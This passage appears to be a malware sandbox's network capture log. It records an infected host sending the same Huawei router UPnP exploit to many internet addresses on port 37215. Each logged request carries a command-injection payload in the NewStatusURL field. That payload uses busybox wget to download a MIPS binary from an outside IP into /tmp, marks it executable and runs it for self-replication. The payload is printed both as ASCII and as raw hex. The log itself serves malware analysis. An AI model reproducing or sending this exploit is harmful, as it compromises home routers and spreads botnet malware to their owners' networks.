                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          268192.168.2.2350076121.116.131.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175750971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          269192.168.2.23506508.18.111.18837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175765991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          270192.168.2.233884641.97.58.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175767899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          271192.168.2.2344064176.177.168.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175781965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          272192.168.2.234300841.57.141.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175781965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          273192.168.2.234997441.29.238.17737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175786018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          274192.168.2.2357836197.24.136.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175803900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          275192.168.2.235895841.71.11.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175803900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          276192.168.2.235338241.87.225.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175815105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          277192.168.2.235616441.42.53.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175816059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          278192.168.2.2333030197.135.46.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.175945044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
